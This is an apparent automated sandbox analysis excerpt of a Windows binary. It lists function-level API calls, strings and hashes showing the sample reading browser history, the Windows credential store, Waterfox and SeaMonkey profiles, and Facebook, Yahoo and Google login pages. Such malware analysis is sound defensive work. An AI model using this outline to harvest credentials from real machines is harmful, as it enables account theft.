                                                                                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                              • String ID: visited:
                                                                                                                                                              • API String ID: 2470578098-1702587658
                                                                                                                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                                                                              • Opcode ID: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                              • Opcode Fuzzy Hash: a8b50b7bcc3e8c665b2e5c478097124d3492c25552be42f1d5eb6a41abf251f1
                                                                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 115830560-3916222277
                                                                                                                                                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 852 418506-418515 free 845->852 846->845 852->830
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                                                                              • String ID: |A
                                                                                                                                                              • API String ID: 77810686-1717621600
                                                                                                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                              • String ID: r!A
                                                                                                                                                              • API String ID: 2791114272-628097481
                                                                                                                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                              • API String ID: 2936932814-4196376884
                                                                                                                                                              • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                              • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                              • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: C:\Windows\system32
                                                                                                                                                              • API String ID: 669240632-2896066436
                                                                                                                                                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 697348961-0
                                                                                                                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                              • API String ID: 4039892925-11920434
                                                                                                                                                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403E50
                                                                                                                                                              • memset.MSVCRT ref: 00403E65
                                                                                                                                                              • memset.MSVCRT ref: 00403E7A
                                                                                                                                                              • memset.MSVCRT ref: 00403E8F
                                                                                                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                              • API String ID: 4039892925-2068335096
                                                                                                                                                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403FE1
                                                                                                                                                              • memset.MSVCRT ref: 00403FF6
                                                                                                                                                              • memset.MSVCRT ref: 0040400B
                                                                                                                                                              • memset.MSVCRT ref: 00404020
                                                                                                                                                              • memset.MSVCRT ref: 00404035
                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
